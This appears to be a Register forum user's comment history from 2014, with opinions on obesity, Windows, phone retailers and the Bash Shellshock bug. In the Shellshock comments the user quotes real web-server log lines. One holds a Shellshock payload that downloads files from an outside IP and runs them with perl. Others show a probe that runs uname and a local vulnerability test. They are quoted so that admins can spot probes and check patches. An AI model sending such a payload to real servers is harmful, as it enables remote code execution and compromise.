Say no to eccentric headline capitalization. It blights the Reg front page and makes our RSS feeds ugly.
Posts by Jim 59
2047 publicly visible posts • joined 24 Jun 2009
Page:
'Theoretical' Nobel economics explain WHY the tech industry's such a damned mess
Ingram UK basks in rosy glow of ... successful cost-cutting
Lies, damn pies and obesity statistics: We're NOT a nation of fatties
Obesety
It's no good blaming others. However fat or slim you are, we all understand the temptation to eat more and more. In 2014 I would be thought of as slim. In 1975 I would have been slightly chubby. But like others, I could eat less food, and better. If you want to see what healthy weight looks like, check out almost any photo taken before 1984-ish.
Neither does it help to tell weighty folks that it is okay to be very, very obese, as some well meaning TV programmes do, for example. It isn't. Being enourmous can lead to a short, uncomfortable and less happy life. It is kinder to (politely) tell people that early on, and help them avoid it. Pretending otherwise is the worst kind if cruelty.
Lights off, nappies on! It's Alien: Isolation and The Evil Within
Women, your 'superpower' is ... NOT asking for a raise: Satya Nadella
Windows 10 feedback: 'Microsoft, please do a deal with Google to use its browser'
Women! Worried you won't get that Job in IT? Mention how hot you are
@Ross K
One of the biggest problems faced by professional engineers is that nobody knows what a professional engineer is, or that professional engineering exists as a thing. The Register knows, and so does everyone in this forum, for obvious reasons.
Chris Mellor's Tuesday is evidently a bit slow, so he popped in here to drop one of the best troll posts I have ever seen. Subtle but explosive, it spread soft and sticky over the faces of more volatile commentards, who sure enough frothed up in a fine "up the workers" bun fight: ...stop talking shite..., etc. etc.
Lol. Chris Mellor for CoTW vulture dropping of greatness of whatever it is.
Revenge smut bullies who send 'grossly offensive' messages WILL be prosecuted
Off topic, but to anyone considering committing their nude selves to electronic storage, especially while performing any kind of "act" or whatever: apply a common sense algorithm. Don't do it.
Electronic pictures and movies can be circulated, copied and broadcast without limit, including accidentally. Revenge is one possibility but there are many others: a computer can be discarded, go to a repair shop, be infected with malware, backed up, an SD card or phone can be lost, forgotten about, stolen, discarded in error. Even if you encrypt, delete or "shred" the pics, copies can still hang around. Don't. Do. It.
Linux systemd dev says open source is 'SICK', kernel community 'awful'
Re: Olivetti and Time Travel
Fair enough. This story is not about an expert raging at a noob but two experts raging at each other. I don't know if there is any justification but many 'tards appear to think that there is, with the systemd man's contributions being more of a nuisance than a help seemingly. True he does it for free, but if you are just interfering in an unwelcome way, that fact that you are doing it for free is by-the-by.
Will we ever can the spam monster?
Re: Anti-spam-iotics
Botnets often start with insecure legacy systems. Eg. Vista and earlier versions of Windows, which were inherently insecure (eg. any user can run any program, any click in email can run any program). As they fade away to be replaced by Windows 7 and later (which successfully copied the Unix "sudo" security model), botnets may fade out, like an amoeba with nowhere to go. Hopefully.
Uni boffins: 'Accurate' Android AV app outperforms most rivals
So long Lotus 1-2-3: IBM ceases support after over 30 years of code
Re: Back in a time where...
ql says: "...we thought that Windows was looking like the future"
One year, about 1985, I attended the Personal Computer World Show at Earl's Court. It was called "Personal..." because it was organized by the magazine of the same name, but it was as much about business computers. We were all used to word processing, databases etc with an 80x25 text screen, and pretty happy with that to be honest. At least it was simple and fast. But at the Show, it was Windowing GUIs on all sides - GEM, Apricot, Apple, Windows, all the big players - and small ones - had something to push. Still monochrome, mind.
Apple blacklists tech journo following explicit BENDY iPhone vid
Windows 10: One for the suits, right Microsoft? Or so one THOUGHT
Third patch brings more admin Shellshock for the battered and Bashed
ARMs head Moonshot bodies: HP pops Applied Micro, TI chips into carts
SHELLSHOCKED: Fortune 1000 outfits Bash out batches of patches
Meanwhile, on a web server that was already patched twice
173.45.100.18 - - [28/Sep/2014:17:27:34 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 491 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Carson Sweet (excellent name) stop telling everyone that embedded devices like "TVs to soda machines" are vulnerable. They run Busybox Ash, not Bash. Or if you know any that do run bash, say which.
To any poor citizens half way up a ladder clawing their IP cameras off the wall - LEAVE IT. Go check your web servers instead.
WHY did Sunday Mirror stoop to slurping selfies for smut sting?
Mirror
Not exactly Woodward & Bernstein, is it ? Apart from the stuff in the article, this peccadillo would never have happened but for the actions of the Mirror. They have broken a woman heart, destroyed the bloke and ruined the lives of his 5 children. I wonder if they hacked his phone as well.
Hackers thrash Bash Shellshock bug: World races to cover hole
Re: How to check?
If you are running an internet facing Apache web server, check the logs for strings such as (). Eg. apart from Graham's scan yesterday, one of my servers was probed this morning from an IP address somewhere in the AWS in Thailand:
$grep \(\) access.log
54.251.83.67 - - [26/Sep/2014:06:10:55 +0100] "GET / HTTP/1.1" 403 466 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
Thanks to El Reg, the system was already patched.
Re: Eyes on the code? Not.
Nah. No hacker worth his salt should waste time over this now. He will be better off looking for flaws that are NOT currently being worked on, discussed and updated by a fair chunk of the planet's IT experts. Shellshock's cover is "blown". Thanks partly to The Reg. The black hats may catch a few internet facing Raspberry Pi's, but to get a commercial server, they would have to work so fast the typing will give them repetitive strain injury typing.
This is a result of the "open" approach.
Re: How to check?
Ret Hat has released the second Bash patch in as many days. Just installed it here. Now Ormandy's test fails:
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: No such file or directory
@Tenable @Register please stop telling everybody that IOT devices are at risk. IOT/embedded devices use Busybox, not Bash, as Tenable must know. If Tenable has discovered any that don't, please say which ones, or point out how Busybox vulnerability if you think there is one. Keep calm and carry on.
Bash bug: Shellshocked yet? You will be ... when this goes WORM
Yes, I pretty much would bet my life on webcams et al not using bash, for sound economic/engineering reasons. Bash is a big, big program and needs a full computing environment to run. The binary alone is over 1 MB, almost twice the size of Busybox. Even a quiescent bash instance takes several MB of memory to run, plus many libraries, plus all the other programs the user will call. Manufacturers use Busybox because it replaces all that. I have never seen an embedded device that had standalone Bash. Big NAS boxes conceivably, but I have never seen it.
The bigger danger is web servers. I saw Graham's shellshock scan at 8:20 this morning in my logs, and patched the server an hour ago. And devices like Raspberry Pi's where the user has it internet facing for
Bigger items
On the other hand, internet facing NAS devices might
systems would be out of business.
To run it, the IP webcam would have to be running a full linux kernel/environment and have
Graham's blog says many "internet of things" devices will be vulnerable and will remain so because they can't be patched. They may be vulnerable, but not to this bug. As 'tards have pointed out, IP cameras etc. aren't equipped with Bash, why would they be ? Embedded stuff, even more substantial items like NAS boxes routers, come with Busybox only.
Also. Errr. Isn't Graham breaking the law in rather an extravagant way by blithely scanning thousands or organizations ? Notwithstanding his good intentions.
BT claims almost-gigabit connections over COPPER WIRE
Of course, the other group of people who love copper are thieves, who love nothing more than nicking cables to sell off to dodgy metal traders. Earlier this year, BT suffered a nationwide outage after thieves severed the telecoms giant's fibre cable in an effort to nick copper wiring.
Metal thefts in the UK have dropped 95% in the last year, since the licenses were introduced for scrap metal dealers, and cash transactions outlawed.
Are you a fat boy? Get to university now, you penniless slacker
Correlation is not causation
The test results highlight a correlation, but do not explain causes. So the paragraph beginning thus:
What’s actually happening is that the boys end up with lower cognitive skills and crushed motivation,...
...has no basis. At least no basis in the test results. It is pure editorial by Team Register, based on their own world view and opinion. Just sayin'.
Phones 4u demise: 1,700 employees laid off with redundo package
What fee did PwC earn from the caper ? Who recommended administration ? What part was played by BC Partners ? Did they really just buy Phones 4u, drain it of 200m and collapse the company ? How could a dividend be paid if the company was not in profit ? What prompted 4u to seek a loan ? Why would they do so if they were in profit ? All of this will be answered in the pages of Private Eye over the next 6 months.
Shades of Pheonix/Rover here ?
Apple iPhone 6: Looking good, slim. AW... your battery died
Relive the death of Earth over and over again in Extinction Game
SanDisk Extreme Pro SSD – courting speed freaks and gamers
EE buys 58 Phones 4u stores for £2.5m after picking over carcass
Top Gear Tigers and Bingo Boilers: Farewell then, Phones4U
I regard car salesmen as lazy, greasy, foul-smelling mobile dandruff dispensers.
Really ? I have found them to be friendly, efficient, usually well dressed and presented.
When 'tards complain of "sales droids" they are really complaining about the company saving money by employing people as young as possible, paying them as little as possible and offering no training.
Got your NUDE SELFIES in the cloud? Two-factor auth's your best bet for securing them
Hate Facebook? Hate it enough to spend $9k fleeing it? Web 'country club' built for the rich
Interesting story. If you want to become super-rich, don't buy shares in this site. Like all of us, the super-rich want to interact with their peers, I guess. But they have places to do that. If you were a billionaire, working 1 or 2 days a week, you might invite a few other billionaires on your yacht for fishing in St Tropez of wherever, then jet off to see how your Scottish estate is doing. You won't be short of friends, that's for sure.
'Windows 9' LEAK: Microsoft's playing catchup with Linux
Re: Meeeh
I sort of take h4rm0ny's point about people preferring to stick with what they know and react badly against what is new. But is isn't really like that with computers and GUIs. Users really do like good stuff, and dislike bad stuff. They are excellent judges, which is a main plank of Apple's success. Give them something nice and the like it straightaway.
I still remember how delighted the public was with the Windows 95 GUI, and how it was such an improvement over 3.1. We immediately loved the shiny new right-click context menus, and the start button menu. I never heard a single voice want to go back to 3.1.
Re: Meeeh
As Reg editors well know or could have found with one Google search, almost every windowing system ever written has had multiple desktops. Either built in or with a bit of freeware. Remember Bigdesk on Windows 3.1 ? In fact, multiple desktops were more heavily used then due to the low resolutions in use.